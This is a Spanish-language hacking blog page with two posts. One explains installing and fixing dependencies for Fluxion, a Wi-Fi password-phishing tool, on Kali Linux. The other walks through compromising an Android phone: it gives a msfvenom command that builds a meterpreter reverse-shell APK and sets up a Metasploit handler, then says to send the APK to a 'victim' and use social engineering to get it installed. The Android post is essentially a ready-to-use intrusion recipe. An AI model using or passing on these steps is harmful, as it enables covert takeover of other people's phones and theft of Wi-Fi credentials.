Hacking Ético, Seguridad Informática, Redes, RedTeam

martes, 24 de enero de 2017

Instalar y Corregir errores de fluxion en kali linux

1/24/2017 08:40:00 p. m. Posted by Secpronet , , , , 7 comments
Instalar y Corregir errores de fluxion

Que es fluxion:
Fluxion es una nueva herramienta para realizar auditorías de redes inalámbricas Wi-Fi. - See more at: https://www.redeszone.net/2016/09/28/fluxion-una-nueva-herramienta-obtener-claves-wi-fi-wpa-wpa2-ingenieria-social/#sthash.1hc8CGFh.dpuf

Es una nueva herramienta para hacer auditorias de seguridad inalámbrica. su funcionamiento es similar a wifite lanzando ataques de ingeniería social para que el usuario la coloque la contraseña y verificar si es la correcta.
si has tratado de instalar  fluxion te darás cuenta que te muestra errores que faltan ciertos componentes para instalar antes de ejecutarlo, pues  esta vez veremos su instalación y como corregir los errores de los componentes faltantes.



los errores de componentes son los siguientes:

dhcp-server
hostapd
lighttpd
php5-cgi


Como instalar

lo podemos hacer de dos formas.
1. clonando desde github
2. descargando desde acá:  Fluxion

abrimos una terminal , vamos al directorio donde esta y lo desempaquetamos (Descargas, Documentos, Escritorio, etc).
colocamos: sudo unzip fluxion-master
entramos al directorio cd fluxion-master luego lo corremos de la siguiente forma ./fluxion
veremos que nos muestra unos errores de color rojo, comenzamos a corregirlos.



abrimos una nueva terminal y colocamos lo siguiente:
leafpad /etc/apt/sources.list



luego de esto colocamos la lineas para los repositorios desde la pagina oficial de kali linux  


luego guardamos cambios, en la terminal colocamos lo siguiente , apt-get update esperamos que actualice, luego colocamos lo siguiente.

apt-get install isc-dhcp-server


esperamos que instale luego colocamos.

apt-get install hostapd


esperamos que instale luego colocamos esto
apt-get install lighttpd



para la instalación de php5-cgi debemos hacer lo siguiente, en una terminal nueva colocamos esto 
leafpad /etc/apt/sources.list y copiamos lo siguiente.  




deb http://old.kali.org/kali sana main non-free contrib, quedando de la siguiente forma



guardamos los cambios y ejecutamos lo siguiente: apt-get update esperamos que actualice y ejecutamos lo siguiente.

apt-get remove php5 php5-common php5-mysql php5-xmlrpc php5-cgi php5-curl php5-gd php5-cli php5-fpm php-apc php-pear php5-dev php5-imap php5-mcrypt



esperamos que termine y luego ejecutamosapt-get install libapache2-mod-php5 esperamos que termine la instalación.




ya para terminar ejecutamos 


apt-get install php5-cgi

esperamos que termine de instalar, ahora ya podemos ejecutar fluxion sin ningún problema
lo hacemos desde la siguiente forma, entramos al directorio donde lo tenemos guardado o clonado
colocamos ./fluxion y les quedaría de la siguiente forma.




ya con esto estar funcionando fluxion.













Fluxion es una nueva herramienta para realizar auditorías de redes inalámbricas Wi-Fi. - See more at: https://www.redeszone.net/2016/09/28/fluxion-una-nueva-herramienta-obtener-claves-wi-fi-wpa-wpa2-ingenieria-social/#sthash.1hc8CGFh.dpuf


Fluxion es una nueva herramienta para realizar auditorías de redes inalámbricas Wi-Fi. - See more at: https://www.redeszone.net/2016/09/28/fluxion-una-nueva-herramienta-obtener-claves-wi-fi-wpa-wpa2-ingenieria-social/#sthash.1hc8CGFh.dpuf
Fluxion es una nueva herramienta para realizar auditorías de redes inalámbricas Wi-Fi. - See more at: https://www.redeszone.net/2016/09/28/fluxion-una-nueva-herramienta-obtener-claves-wi-fi-wpa-wpa2-ingenieria-social/#sthash.1hc8CGFh.

domingo, 8 de enero de 2017

Como vulnerar un dispositivo Android

1/08/2017 11:55:00 p. m. Posted by Secpronet , , , , , No hay comentarios
Vulnerar un dispositivo Android


Que tal esta vez les enseñaremos a vulnerar android.

primer paso: 
abriremos una terminal en Kali Linux y escribiremos lo siguiente:

msfvenom -p android/meterpreter/reverse_tcp LHOST = tu ip LPORT = puerto a la escucha R > /ruta donde lo guardaras/nombre.apk




Segundo Paso: 

Luego nos quedará el archivo del al siguiente manera:



Tercer Paso: 

Abrimos metasploit y lo configuramos de la siguiente manera:
use exploit/multi/handler
set payload andorid/meterpreter/reverse_tcp
set lhost tu_ip
set lport el puerto que colocaron en el archivo que se creo 
exploit (esto es para lanzar el ataque)



Cuarto Paso: 
Tenemos que mandarlo a nuestra victima y usando ingeniería social hacer que lo instale, una vez instalado se abrirá creara la sesión.




con esto ya tenemos acceso al sistema.


para mas comandos escriben Help.